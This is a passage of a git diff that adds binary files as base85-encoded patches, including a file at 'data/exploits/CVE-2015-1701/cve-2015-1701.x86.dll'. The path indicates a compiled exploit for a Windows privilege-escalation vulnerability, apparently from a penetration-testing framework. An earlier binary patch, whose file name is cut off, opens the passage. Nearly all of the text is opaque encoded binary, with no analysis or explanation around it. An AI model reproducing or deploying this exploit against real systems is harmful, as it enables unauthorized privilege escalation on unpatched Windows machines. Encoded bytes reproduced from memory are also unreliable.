zNPGGZwx{!Vy|El^sN;kfl(QTy$bLMX3zCm)Z|Qiu2jgY_^h$emw5hh|41fBieIP#)
z=latp@s0j^mbjo#_;x>EN_%zmq{c_5^n%kD;B)EzW<MXw_C(yKx~KA|lhVPMPO0_A
zeeHYu&+Ox0-swOg$oK;FE%9=H{YjkT=NpOhae6m6emWZ%jMY)28a|zw?rq;YeRe<J
z%J8XI6YSpE$DU3ns`k`Rq7&mPrhY4hA|E-9ptI>JrvA7(Ye3^`>aVM#WI2yO<*kM%
z-;V+QQL!qAB&L5ge0qQ8`T0@W=cC=oNA_a_>688JK)aOV&cJ;ca{Lf%PvKL$m5=O~
zsIw9@&Zqp#yGqD~94FBkI{C<PoH`pp^Af~g>MV(zC!zMP=1=xp)!7p{e-eY9k2<d-
z$3M&c<t4`}EBx(4jtc_mSNrX%3E>z>54HT{_-2J)j>~bOIvYasA~bGPXGv(@f$B5R
z9_9E>oed#-8aJr15hgiE|MHRJl3;t;-U9Z7^ZooM$8Yp6A33g9XOHB3QZWC>e!e=(
zMD`SauzLzWAP?j?ERY^KPoU09(R>W?JDoq2kHqvZAGKesN(>dNEndZHi<I*W>MWO>
z=ZZn-syvnBv_N`fKRnQWBo5?9V)~bloR?5%%jA4l40ukJ7u0{FcaR!_iq#MZQ$IV{
zo^Y@|m8hB`wLciZG!H^2I@R>3?T5IW=AzW`QNTR-eJJ~_#VGf)xtHd>-4lPRu~U8t
ztEnYS<8?a0tfq(3KrZB)TaL2><xQu4gZWp^+o-dQG#^K~5Acti$5Ce=$)5NnP@i(%
zhR(RkN6z!u{qJu%4wV1F<r8ckoL@OFvl6M0kDNaVq(}DmNS;WE9Ke!eRjm4#ILDtJ
ziRt{ed?YUR%Lj=a{`aSxuL;D@-u~N<BmIrzV4{1OoKLUFkkpKX(OMRbL}*O47$b&>
zz&&@%{q9-Ov9Ymg;z1`*STx@}pJ>8-nu8-sbM2EST&<X^@;J!LzeL+~wM_5d8<=Lq
z05M|OkZyg)ptcC_0J|<NEV(~2q`}76;hEuLc*+1Vd>Zr%4R%fc5Yc~1NUXGjSxOk}
z`itRHU>B+pp_pXR4AqIDDdA!${0yBkxMQF_B2A+U5xNthcFo8EVr1q#F)}4VjGSf@
zBQ<k{0R`d@R}Dj@YJ3+A5*IiU#08l)aly2?;sT9HM0TIkF}!W4*N_bV?4I(jVKpQ?
zM1)W2ADcEynoY)nPAZh)uq>egqx*}|(}sxAcOxA8ur$?O7B&t{HVSbC++7Yj1P2O+
zO$!slrs(bDCIsGF&llpaQ0qCYun9u^9IBG>knm6uj&ec#em@OhnunoOKZl_I1j_Gc
zY`7SksTX6X4HjdI{JB&7Q=XPwgtdT+5r!IvagZ<`950NHal)8+t}sp;D~#BzI;wkQ
z$A~r|)U=L`#$91hud=^X=(}P9n9Dv{qwg>DnPEbYbnB-?*d>kt4j1}`z~>GW=Q<+9
zx!{R&!4v1Ae$Snv#O6IKuW<QmaNuLmv;kt!l>W&YrCf0PKv93Y1_w!WMWJ?W8u&@A
z=TYHelw*Jxm8lb>z+0n`mQhnibZEv7MA;a`*pxHNXNaM{FgU`50d5Ub26m|RxEUKD
zc0zS?zR$+9LpWa5&!TwrtDyeaiUP+Y>oLq<k5ms|T!lLZZ9)uE-B6l8h(NkQGm&<b
z%czATy45hZCtyrBFW`REq;PRg$`EnRG=n&&XlS>gW3ZRnNFH9aw1zq=I!xdL?cmKv
zu{E(tM1a4^&fX7pmkki(98ZaHnR~^!X-|rAnkNMDKiOB2eN2QHlX<lmlaegPOj{tv
zXy%FG-9tO5jgcD@m{)Bp1N!hN<t=HE5H6@#<c;VMr9Oi4HDyHiu#O>KHE$QB2=Osg
zGMB{wZilM<YAk}Rg`%*D4jCDa_OD0VA1p>L9M(OgL*F*Y8{y~iRBTds2P%`pgEyfG
z3lU+O`~B^j!s^AFMG?rIj6*XxL=2u19xLsKfOic-e<H#@DrS&%ykjWJW(eXoh+*-A
z?+)+Qb@Xow^@ecy+5F+^;cu|eKce`%e7wT|e=^O(rVcLZ>o1lf$3y9&hv=wrI-$Qi
zqI*C`n75xjG)<cv5=-T;#6kR;ISBkZP#EqWXealwoCkt`z(;6r#6KwKHY!JwH+Br_
zAA`D;%jHVwUxeDmc!<(=2O!;u7j0E7|8uYi?S?v_x|96ww|@?HZ$hd3j;JJm3<Vva
z5d)Ti4yX43WPD0L$ofz*e5k=bWJrH81nC?yWl%?iJ=`xlZ&@$IKBy~?P)Nwv2%Q))
zEkcZ#qP$;F(*d{3TtfT?>aU!(QCCEWNz;n8lQcP6LpR<VZQ)*>JuIz1*H7#igondn
zddOmuPih`-D-+@_sDT`(!XJHPf|3pg(gOK50&;@VqxwIJjSL?_O;r6WJg-Mx42BFE
zg!(|e+&!Y>$MU@UP9a`~QuC~|uUo+bI0!aq+Hf)Gi~e@1dm4w2!r`%qFQm-#o5c(i
z;~gW!_{`yA{IsEB{3CwZpG<COonq9*5qK|*6Jv20;%sG82{%f-R9{rbMJ!Vnf+})*
z2;{Z_a$66%Jy@K3w|q;C8q;44)C>{9JW7p8%G;rkw?hyw<nG=6G}$#u`Jh}fQ7$RW
zuSFv|Mn(1$1Kv|ZlJX{v(td7#G5CwH4%LS8q{I;!E+Qf4BO&J_Q74f@hj-v@Zr2R$
zFNS_FObm4l5kpTzBrEwkA887bSEI&*|I~EHhA8EvgxN1d^qYp;M3go*L>L}H3$*u7
zmgRRI$}jS)<=2FC20!<|RRC!v#L!FWW)j5BN(Vd;%0Sd0L=-4y+E!-8Oo^R*dCcUW
z#ZJDo<cev^Wz-9^vh#2P90$e|ak;d-Zns2n4=;G$rhC2HglOdZ<jL#~-2EMUf^=s-
z|G9Ub%36s3+&eGJ;eYzx`5aBqP17PVgzqshXJ!^Dm$m;8+WU%iNW~CaR=QnY0)A4_
zD;I!^t5v`7M=tQCHVs1SeM_}Ce5P4KrWmgYzJz?Xmf9BIer+u=3o(YmPAbfF=4HuC
znqlVAE^s>RPFz>L%(-0N01eZX<WgQxt=?X}+AMxyT{z#GsNN@kJ*9y!f-s9vZ3^xX
zFV4el)odojE@8<nwx>HXa{SK3{kZcuTiy~uH$5P(LE6OyMOn*paRq)+d|rBSG0c)f
z76zLrsn6$I!=-03dOigAOG}toSg<_VQDhd~8p?G-MqvR~YZqA;s;RwQDY3%*eB4fr
zd%CmC;%HDA%A3ehghEF-r@JexMMZ^}o^pjEjv)N0uoh$#W@aT9=HkZmB5{=Na1O%f
z_AO)O&h=bv67B-eowM4Jl~TAQH!~|9_wWm2KUJGj=(iUul(KhZ$|@4#8%ihLqMfqZ
zo+VBozPv0)-}~RijnY>-F7mh2#TrY*s6a}{_k3Ifj*{J~RlYcooK>WJY@i?`OS#M&
zIdLf=C|@F=JH^e#N}SM%cPRzdf|a>Ng$4PzD_yclG5Vs*6}~^4Rb(i>c@Up&$35JL
z0Yz2f5aY>Aez0J!vq0WkU*Nzs+u{PU;U=<J`D}s^?}aWd$WiVR&$O0g;6iO&bB`oZ
zp^HbUR({mFE96J-$u}2dF0$tqD0#-G2NvaJ;r8!ip($BK`MCw)UA}z;?K3pRe@FkT
zq(>3Rd--1@gy<!Dg^<#8#|6q;RvpS`66H%~2)DI=0p1}d?|pT@5Hq!jS?Md!s8TUd
z%lEa%6NBNt6;VJnVUAD6h?-(sU`--@iNeXrRP7=Jew4PnJgX=f!UxqQ`oqkBfBjs1
zApmuv+D+@H+?!8zEk*}&pmGfIVCpSLVDg3{uNG!W>19{=M!B(`I287`pD9yd`bWjr
zB7D0*h|9Ezfg9&xw^XCt<WI5sZ}6{Da#dJRT$q<dxqKuDLx>@idx;Ac1zL)eFonU5
z6Gbkj%KU)^DV!x(!BxH`z>VupmMP>3$@tInPnG~a0(Lq$2*UKZ!h=o!c|C<09Ev6w
zK;IYlu|C88pLPHD`u}^=^Y@0|*L`2yH~#;tn92oHTK?yfb~$ey%XAvkIHt3hnwVOc
z+L$IYO=X(K)XsDbQ#aFlnN~7=fN2%eI;M?GcQ9>Y`WVw@rcX2VGHqqr#`KR&KVYhc
z|1smgF#V3H?sZunkxY$DW0}rkYGP_*n#vTPad%M}tNiC;>}FcQw32BR(?+IEOq-du
zGHqw-V=CU@bTW-%YGP_*n#?qnX&TcUrgo+!OkGUfOe>gHGOc3T#I%)ZJ5x1$ALAaT
zI=&Aml4&ec6Vp_tc}yKlT}&&PdYP*C3sqQquXCv7?q~3ysCjHo?{NBh``@w;=B2)A
zBHZ>P>pWhc<d5V}ByIatQt#i$=h@=;*P0oA^pWuxfAsm+rsLlvv>#u9lnMOt`x5_6
zGVtG(j2~qagN*S<*~IwYm7@RIaR2|s7@81ylT)1*Ymv9EzV$pV%=&kvrh1E{8y@QT
zj&!DVE`>J2eM{{dwMJ=u#{Y&Nq>+i~<3G{8ncY7D_b=6aP%~Qmsm51x{f~#gu3GVN
zHP+Rxe&bhf7{v{5-1x?nGu^-3{&vULSTkP7DNE@6ULkpY4pay$M6c*WK_j6MJnojq
z_e7xvK!rgKgwio3Gr}~yAiD@C)sDg?zeM#=6bCgHG8+Ollogp%`IGtOP=w8l;~8W4
zsrXsQ=2-qy+|!tm!oL=Z;-+0V6iz;r5y}oV779}qO8O}u<lY5EY2Lu}R#3`IDHPdn
zgracng1QLmLB`dfl)gGBimw5R-0gv)JRO4~`;$;)ABjSt@=?ny_9pq>`&ZGboZj`R
zVvPoost-#j6`qY!nuEQZ%}uZwxhM6X=RYOzpAz`TOJGXPJ2AhD#(Mcu<B9B7PM`jv
z&%8>`LfO9Sc;DAQOV{(0$Kf_|xPLFb6j>&v_V?BP{r-=nd{axLuZ%d@$DU+Pup7!h
zJx(kd7t_MA@^r5kcp+)NJAIno4<uJjP^a;-a)EAudwN&Vd&dZcCH^y?st}Xku(e-6
z|BcSCH$5=WuTMUp_v<JAWvHrm{kHNPRd0Oy*-=s-y6?!CJEoDo`jZ!qjoJV5e3P;J
z!N={<jXR(FL$0Z9>GzZVH2RJOqq<5>H~seHZ{i2{E5B&>gQl<dRarjSF!at1w?1jw
zH|y2<mrf^)FWLXHsqj$8?VYY8SM9y0(fstL6^k#NUVh5nv1ZQGZ{6|s*MIo7Yu&c1
z<E#I?^8FXSxahKt8!oU!8AfjF*=2bDxr5(Wx*A^j@>JKm^KSmlOV+Fx4&ODnepl6~
z_iN`4${IP)x#8E&l}BtzsdGMPxM%vz%bOqhWKmMXpO#+v+|rqz2k*Y_^wRq7YNI!0
z%k4i)KmNVvI#2tgrDb2gxqRDidcM4HUrp=Mw_F8@NAADRxH)8D+QCUq<X61-!i)Sd
z`EO_6bY=L-T08yq%)Tyj<~s|@?<*Ku`q$Y9UcMx2)O)ET_Z<IxcAI{}#;e9$wd1*l
zPiLFzpUBPI-S3&7{km)R)GME!bMv2Gy?5VhAI{$Y{rAVxHx60#!uAhlUzT|NyGaM1
zz4teNJ~I36gNtT5EiVp#_V>GIzrB3#z0<8b$36Vgy|X7yIP~7rduL8g_uM=?eety|
z>mFXTX6REl%s%<)W##>!y?fJ$Z!NPY&fd~FeanR(t#7<|_SzlQA3UA8W^UVCi+`SR
zOaB)pq^v4Eeb<I7@A_uOsGBn;#ZUI`m~~#+@wi*By02M$e{$v@-Kn}U5BuK#b-i}x
zp^er#VNd+d`Lj1KoiX*Mu_q?HIpx!YitDD=-}bC`$s1d4t*?1}%6mDF3~5;SkmcGv
zhD#<Td=PWRv;~WH9a}N!&TB*Kyl?Mc`>pTLxCcLUU$^A0S^JVp&ySq{i>zhem)^O%
z|GjI6d=T^YL&r|EhQ3wb{twOA(z^fa!_h7$YD5R<)gy%PL7xix0MvKT*MW{eCnt20
zMvMi$2r3f#SkON~8KM6eboxjkra^B4oq`573;H<Fr=e1yKL~o!C?S3ceJtoAs7&a8
z3HlIJ9`uc%Z((nY1Nsj@>3+z2$vvnSstWox(A#ifMjiBS&=1F9-vRVK&`INQC)WiU
z5d~^9Vs9hNi4H#>caB~NbI|K2U>_aKe+gO%l>&33PqUur&nIG)CI)!{4Vi@fGzc>k
zv=oZmZv<_G@<t)epq*^~F=)sI(oHDnybEPGiJ(PLieJ#tQBofTTFiO}=qpf^PNIX*
zk)$+4fj)CF_Rb&;UeFFGiuYsCQ4p$bn2!a$6N>U)0a|()>Jj>lpud=m{k_m9g04lE
ze>lQ-fj$Ej1-%zEZz}f5K~FSo8X79%CHf-NESR@}nlDG0LjM@(J5ZE{4$w=kka;0`
z!3?R71zo`UWKcWniGBw4ON7%6dgDx~&jbC0_1&ORvpDadw6}@MfvEZC;0^e-fV!c`
zoTz@bEH?w_i%=DmX3)tdStjkE1#_gE;qgM0LA?Msw}XBPMd9F^^CHqB^QBPeslL3R
zS6ab)mw+EYk3mr#wShi-71D=tcnq|_hW&#uw}U=54`UZH2VItg_Yd@$px4Y7Vh!|Z
zpwB^3U9^J!8LATD`#>iwkZG6*x}5cupkWKqCgE2H8U;n=Pjn>|rN0EUlFdyR@RUQf
z!i^VHn<DcP3OaZ((g|||=!H;9IH2iJ6iy~+Db(1Dz(1hXP~@f#^duCON#r%)t5om?
z+}J_yg|b6m1=<W%0=*Zs1!@iSZJ@`YT+qJ)ns=>?i|7MT6h2YSb(~Jn%URzDdfxRI
zW5I76=<lE?4Nah_zeJv4PINFX0V4i4fWFWA4?x%bO2*{^-FyS$gZtY-d!UH_iGGnG
z&Hn=0k&XI;8=@<hL(V{70{UqV$_@H%P}=wPN9c)`K~ef|2mK6+(uTt$Vmwsj#gJW~
z*I}S(ggz6r6N=n?47wy=>K&k_0;wnJf}${qeu+WpMELy+Xv|I0d=}_ktiKm@T#;-?
zM$m;&<TnNMeJB(BCKn6wcnS7tK;I1dHWaz(0G+*B>P?`xLs8m@_Pbe@=Wx((pi<!X
zJJ7mYP~XrK?Sgt5da(xIZiecBJ{k0PP!!Gsp!sVdi(qaC9ljp27kZ*yP@&N%2hbN?
zkR#Byfws6&uh1U^{dt+JI}>O<)Ebz3L2uiP_6WTj)aXHdK~MB~s5<Ch05#n%^OXm>
z8;aU*6X;)A-vjC?mwCJ$^sPIPe)#o)n(vfpwt$9JfLCCy1KkfrZR8;6w@{SF??A`i
zCF3Hx1j>lGQb8}g8*K#oDA3QKqM)z12j8*&9qIyl8|V)YO1*dpZLk6I4d$7kZYT<e
zX#YkjA9SG2+lBZ5=0qRfDMS<WkAZIA1(^o@4$whOLXqJH(08FCk>(GGJ_0!py%F>Y
zC@K>#sCX3bGw5}ow?UEl1E9}74w(=4UeFm&Nb^~scVGe|4dzXte`!YBho0!ZCuR9~
zLCg1|O~JeZ^s1-OexbL4PIwx11pP$N?+&5vpr>;TbVi{K?UyK>D<C~lI#WP;qI6z>
z^hD_l0O^U+zIf6TrM>K=Cwc+vX%9H<>n3xev?rVNL}?!~>50-FWYQC*ea56GN_&b)
zPn7oflAb8-(<MDo+H*^KqO^aO^h8rwk5c~kd)kC@hQG3=s;04~siw82t){)kx4nCN
z&vvmRbw|#Qk{#|Hl{*@DH1BBL(Z0jCqi2V1XXMVPopC#DJ5zV&>@3;o-dVY`acA>R
z(T)0qD9EWQsd86URy9^NSG88PSNW=Xs&v(n)lt=P)wb%?>YVD5YIk*Ibz^mNb!&Bd
zwXeFTT2~WU6IByeW2;H6$*C!+ao1ELJ<UiDQd84YqpOXqjjD~SwbiE9=G2zdx@#+I
z8*7_uTWi~EeYHKcy1K}^sJgg1TU}~hPF+czyRNdXv97tUwXVI+SJzXg+Y-4YYD?S}
z+m_TVIa^A$xVKbpY24DhrFBdD7T=bhExP*1`l$N2dRu*JeNKHzy}Q1$zOlZ!zO}x+
z-dEpKuWN{Gh-!#yur;JM<TR8txEm@P8XKA$S{vFMd<{Jfy2i-HsK&TPTVrZtPGd=<
zyRovdv9Y<awXwa?*Vxmj+ZwqwYHQq9+t$>rIa^D%y0=ztZQR<twRLOzR^Qg1t-5WI
z+oHC`ZL@7l-IlYhWSe_i<+jFc&D&bHwQuun>)EE;9=Sbgd)#*0_SEe;+e@~)w^wd&
z+}^ysb$k1EAL>fCBXUR7j<_ARzq8I-ced~J?d;j9+ZDMhYFFGY+pg4IIlD@Bxp!6W
zs@m1G%e$*>SI4gIU1GOkw{dsuZqx4M-D$h+yIs30c316g+U?!lw!33@_imaEtV7+4
zDnpgADz?g0m0XopWv_BoRa8|~HC1`5+NwILx~oLBq1sp-TWzXNu1>4ASG%e!s;jD-
zs=d{1)g9H{)uP5wW2}j-G1Vm3q}AAKTs0No%%&PI__Cv>yGGO+YK^tAwWiwS+O%4G
zt*f@8wyL(N)?3?F+fmzHE9wk&#=6)#Q(bahTAjVlRaa40Ro7JKt!u06sOzp1TMS!_
zTVl7Ewj^&!+hX71+ETHlYD?1=@0PYL9b3A$h<Zc4u|BrmRG(a*R&TF&)mPM4)i>39
z>)Yx(>bvVjgQ3CL5ZhpCNNz}Lus66GDjKR9ni{+fZ4Dg_-3_AA&}eLoZ8S9|H>Ne(
z8(obRja7|Jjo!w##*W7BMzPhf)wnfwt7&WU*0inmt*)&VTdTG<ZS`(#+uE_Ud#l)H
z*k;@oyUnyMd0W~x`!?6MifvWfnznhjwQcLz*1b(^H*7a<kKJzCp1eJ6yM4QBd&Tyu
z?M>Ug+uOExpw)^Uh8@Nou{%sVl6R!-u<vl~sMt}pqiKhCN81h@s8Z(BJJ4cuXdl9a
zcO9zC%dNfxEv*}EP1Nd8%8@AND3o*@%G!p~PDOd=pu|g1=5CaFCCa@KCEtv)Z$;_1
zqx^lSfgaR>PN{_`)I%I<!iKs?MQ!AuK1xs{Zq!L7YNZkN(u|sEMcuTcc6_Lx9@LNy
zbrgwOib6fbp{8u8t5noh4(h7}HP(t2t3zwGp>`@!JB_Fx<BlrGpe9Hm@6OhpZQ$w-
z@OAf2Y-xqy*9Z(>L>pvH2c%6m<c+A&fzu)(b7CQNOprUtkUVMNxDxPORSlf~pLqU1
DKMg>m

literal 0
HcmV?d00001

diff --git a/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll b/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll
new file mode 100755
index 0000000000000000000000000000000000000000..db6ef0271219892dc2589f97256f745997d470d3
GIT binary patch
literal 72192
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
